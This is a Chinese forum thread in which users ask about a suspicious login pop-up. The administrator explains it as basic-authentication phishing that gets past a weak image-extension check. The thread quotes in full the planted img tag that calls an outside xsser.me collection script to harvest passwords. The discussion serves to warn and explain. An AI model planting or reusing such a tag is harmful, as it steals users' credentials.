打开这个页面,跳出这个框,是不是有毒?

▄︻┳一

打开这个页面,跳出这个框,是不是有毒?

▄︻┳一
12年前
#1
http://www.openlab.net.cn/forums/threads/3138210.aspx#3138210
Adminstrator

Re: 打开这个页面,跳出这个框,是不是有毒?

Adminstrator
12年前
#2
我艹,xsser的人要死啊,跨站都跨到这里来了。。。
大家千万别输密码啊。
Adminstrator

Re: 打开这个页面,跳出这个框,是不是有毒?

Adminstrator
12年前
#4


▄︻┳一 #3
是不是盗号的?


那帖子20楼Solaris贴得图,是前段时间有人拿xsser的短代码跨站攻击oschina的东西,输了密码就直接传给别人了。。。为毛我这里不弹窗呢,你什么浏览器。

▄︻┳一

Re: 打开这个页面,跳出这个框,是不是有毒?

▄︻┳一
12年前
#5
今天用firefox打开页面很不一样,字体全是小5号。以往都是4号字。
流方

Re: 打开这个页面,跳出这个框,是不是有毒?

流方
12年前
#6
呀,我的也是
每次OL有人吐槽男朋友的时候我都只是默默路过 173cm
Adminstrator

Re: 打开这个页面,跳出这个框,是不是有毒?

Adminstrator
12年前
#7
果然FF会弹窗,Chrome不会。
Solaris真蛋疼,又不是自己的xsser号,给别人送帐号搞毛。
▄︻┳一

Re: 打开这个页面,跳出这个框,是不是有毒?

▄︻┳一
12年前
#8


Adminstrator #7
果然FF会弹窗,Chrome不会。Solaris真蛋疼,又不是自己的xsser号,给别人送帐号搞毛。

但看他以往回复的帖子,就不会啊

Adminstrator

Re: 打开这个页面,跳出这个框,是不是有毒?

Adminstrator
12年前
#11


▄︻┳一 #8
Adminstrator #7
果然FF会弹窗,Chrome不会。Solaris真蛋疼,又不是自己的xsser号,给别人送帐号搞毛。
但看他以往回复的帖子,就不会啊


上面我说错了,这个是基础认证钓鱼。FF甚至都没显示出他发的图片,Chrome可以显示图片而且不弹窗。


OL的图片校验有问题,只做了后缀检查,所以可以直接插入代码冒充图片。


他只在那一个帖子里插入了如下代码


<img src="http://xsser.me/authtest.php?id=23wUDp&amp;amp;info=www.oachina.net.jpg" alt="">这是攻击oschina的,估计他也看到这条公告栏http://www.oschina.net/question/12_81658,于是转过来,害的不少人中招了,这什么心理。。。。


输密码的就自求多福吧。

▄︻┳一

Re: 打开这个页面,跳出这个框,是不是有毒?

▄︻┳一
12年前
#12

是用chrome看页面源代码才看到的吗?
是直接盗cookie吗?
firefox会不会中招?
▄︻┳一

Re: 打开这个页面,跳出这个框,是不是有毒?

▄︻┳一
12年前
#13
我用firefox看他的回复源代码看到了